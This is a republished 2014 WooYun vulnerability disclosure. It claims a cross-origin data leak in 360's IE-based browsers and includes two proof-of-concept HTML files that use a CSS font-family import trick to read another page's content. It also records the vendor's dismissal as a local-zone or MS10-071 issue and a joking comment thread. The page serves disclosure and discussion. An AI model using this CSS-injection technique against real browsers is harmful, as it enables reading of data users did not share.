360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

admin 2015年4月20日03:29:53评论547 views字数 5519阅读18分23秒阅读模式
摘要

2014-07-04: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-08-28: 细节向核心白帽子及相关领域专家公开
2014-09-07: 细节向普通白帽子公开
2014-09-17: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

漏洞概要 关注数(33) 关注此漏洞

缺陷编号: WooYun-2014-67448

漏洞标题: 360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞 360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

相关厂商: 奇虎360

漏洞作者: 从容

提交时间: 2014-07-04 22:20

公开时间: 2014-09-29 22:22

漏洞类型: 非授权访问/认证绕过

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 客户端程序设计错误 搞笑有爱

4人收藏

漏洞详情

披露状态:

2014-07-04: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-28: 细节向核心白帽子及相关领域专家公开
2014-09-07: 细节向普通白帽子公开
2014-09-17: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

360安全浏览器、极速浏览器最新版及以下版本都存在跨域漏洞

浏览器安全的基础就是同源策略

重点其实在"漏洞修复"那一栏里

大爱乌云!乌云万岁!

详细说明:

下载360安全浏览器最新版6.3和极速浏览器最新版7.5

code 区域
http://**.**.**.**/
 http://**.**.**.**/

360安全浏览器和极速浏览器一直都是都是基于IE内核的浏览器

问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value属性,从而就可以实现跨域

漏洞证明:

先写两个测试的POC:

test1.html

code 区域
<html>
 
  <head>
 
   <title>test1</title>
 
  </head>
 
 <body>
 
   {}body{font-family:
 
    WooYun
 
  </body>
 
 </html>

test2.html

code 区域
<html>
  
  <head>
   <title>test2</title>
 </head>
 
  <body>
 <style>
 
   @import url("C:/Users/Administrator/Desktop/test1.html");
 
    </style>
 
      <script>
 
         setTimeout(function(){
 
             var t = document.body.currentStyle.fontFamily;
 
             alert(t);
 
             },2000);
 
      </script>
 
  </body>
 
 </html>

360安全浏览器最新版6.3下测试:

用360安全浏览器6.3访问test2.html

但是要设为IE兼容模式

360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

弹弹弹....

360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

极速浏览器最新版7.5下测试:

这两个模式下哪个都可以~

360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

接着弹弹弹~

360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

这两个浏览器的所有版本都有这个问题,不信你们试试...

在test2.html test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test1.html的页面内容.

修复方案:

在次先请让我吐个槽,多谢!

我上次提交的360安全浏览器5.0版本,那个时候是最新版,你不是说从5.0版本停止更新了么,有图有真相

360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

你还说推荐用户使用360极速浏览器,可我发现极速浏览器也照样有这个问题啊,而且还是最新版!

我可没有什么意思,我也不是为了几个wb提交写这一堆废话,只是觉得学生党提交几个漏洞也不容易,你别说忽略就忽略啊.

就算忽略了也可以,但你们倒是付出实际行动啊,行,就算你接着更新了,但起码不在用IE8内核了也行啊,不是什么用户都会打系统补丁.

一群大妈用360"安全浏览器"或者"极速浏览器"在网购,然后被恶意劫持了,理论上跟360没什么关系,但是用户对360的信任也就没了....

请原谅我这些废话,并无恶意,还望360安全高管们重视我们这群小白提交的漏洞,或许有一天会因为"不在乎"而出现"大麻烦"!

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-29 22:22

厂商回复:

您好,您提交的不是安全漏洞,在本地域打开的网页是有此类权限的。

另您提供的代码是微软MS10-071漏洞的代码,打上微软补丁后,可以修复。

参考http:///vulndb/

最新状态:

暂无


 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

 

登陆后才能进行评分

 

100%

0%

0%

0%

0%


评价

  1. 2014-07-04 22:23 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    1

    @奇虎360 不要找人来打我啊....

  2. 2014-07-04 22:24 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    让我的人生尽情的燃烧吧- -.

  3. 2014-07-04 22:25 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    15

    一楼二楼我都占了,三楼是傻逼

  4. 2014-07-04 22:27 | 瘦蛟舞 360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    0

    力挺三楼

  5. 2014-07-04 22:27 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @瘦蛟舞 擦,发错了...忽略即可

  6. 2014-07-04 22:30 | zzR 360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞 ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)

    0

    力挺三楼

  7. 2014-07-04 22:34 | xsser 360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    洞主通过internet域测试下44

  8. 2014-07-04 22:36 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @xsser 你我懂了就行....重点其实在"漏洞修复"那一栏里

  9. 2014-07-04 22:46 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

    0

    好机智的LZ

  10. 2014-07-04 22:54 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈,看世间千姿百态...)

    0

    机智的三楼。

  11. 2014-07-04 22:54 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    确定可以跨域???我试过了 不可以跨域 啊

  12. 2014-07-04 22:56 | 奇虎360(乌云厂商)

    1

    xsser审核过了? 本地打开的网页是有此类权限的。 另外这个漏洞微软是有补丁的,建议楼主和IE对比测试一下。

  13. 2014-07-04 23:00 | Lonely ( 实习白帽子 | Rank:80 漏洞数:30 | 人生如梦,始终都游不过当局者迷的悲哀。)

    0

    @奇虎360 原来360 还是关注 乌云的。

  14. 2014-07-04 23:01 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @奇虎360 是的呀,,,,这属于IE内核问题吧,,,

  15. 2014-07-04 23:33 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @雷锋 @luwikes 忽略掉即可…

  16. 2014-07-04 23:34 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @mango 重点在修复方案

  17. 2014-07-04 23:36 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    0

    @从容 你之前的也被忽略~ 这就像安卓那个原生组件漏洞一样。。。 - -没办法定义~

  18. 2014-07-04 23:43 | 小小鸟 ( 路人 | Rank:8 漏洞数:6 | 小白一个)

    0

    3L V5

  19. 2014-07-04 23:56 | 好基友一辈子 ( 普通白帽子 | Rank:274 漏洞数:68 )

    0
  20. 2014-07-05 00:20 | 奇虎360(乌云厂商)

    0

    @从容 同学,我们之前回复推荐使用7.0是因为可以有多个核的选择,5.0是我们几年前的老版本只有ie内核,如果ie有漏洞且暂时没有微软补丁修复,我们是推荐切换到极速内核的。

  21. 2014-07-05 01:19 | xsser 360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    跨域应该选择internet域测试 本地域权限很大的

  22. 2014-07-05 07:41 | ddy ( 实习白帽子 | Rank:45 漏洞数:17 | 其实第一次要我挖洞我是拒绝的。因为,你不...)

    0

    机智的三楼。

  23. 2014-07-05 09:47 | ty4z2008 ( 路人 | Rank:21 漏洞数:5 | Web与数据库习者)

    0

    力挺三楼

  24. 2014-07-05 10:15 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @小小鸟 @好基友一辈子 @ddy @ty4z2008 你们想怎样......

  25. 2014-07-05 12:14 | 小小鸟 ( 路人 | Rank:8 漏洞数:6 | 小白一个)

    0

    @从容 ~.~

  26. 2014-07-05 22:03 | 安然意境 ( 普通白帽子 | Rank:194 漏洞数:83 | 暗室中很难找到黑猫,尤其当里面根本没猫的...)

    0

    机智的三楼。

  27. 2014-07-05 23:21 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    0

    力挺三楼

  28. 2014-07-05 23:29 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @魂淡、 @安然意境 @ 又来了三个.....

  29. 2014-07-06 01:37 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    0

    @从容 哈哈

  30. 2014-07-06 14:09 | 法海 ( 路人 | Rank:26 漏洞数:5 | 许仙去哪了)

    0

    @从容 三楼的朋友你还好吗

  31. 2014-07-06 21:11 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @ 多谢,哈哈

  32. 2014-07-06 21:35 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @ 你的ID怎么是宇少论坛的...

  33. 2014-07-07 00:54 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @ 为什么不自己留qq呢

  34. 2014-07-08 12:21 | Hxai11 ( 普通白帽子 | Rank:1242 漏洞数:237 | 最近手感不行,挖不到洞。。。)

    0

    评论是精华

  35. 2014-07-08 12:22 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @Hxai11 ....

  36. 2014-09-29 23:12 | Moo ( 路人 | Rank:8 漏洞数:3 | PS:不打脸,还要泡妞呢)

    0

    高大上

  37. 2014-09-30 12:08 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    忽略了还有钱?

  38. 2014-09-30 15:57 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

    0

    机智的三楼

  39. 2014-10-01 00:00 | 沉默 ( 路人 | Rank:23 漏洞数:6 | 国内知名Web分布式实时计算系统架构师,分...)

    0

    我特意登陆了来顶三楼的

  40. 2015-06-13 22:37 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    0

    我特意登陆了来顶三楼的

  41. 2015-07-02 16:11 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @伟哥 你妹

  42. 2015-07-14 10:37 | 爱梅小礼 ( 实习白帽子 | Rank:93 漏洞数:16 | 我怀念的是无话不说)

    0

    @从容 兄弟,这个真不叫跨域

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2015年4月20日03:29:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞http://cn-sec.com/archives/16664.html

发表评论

匿名网友 填写信息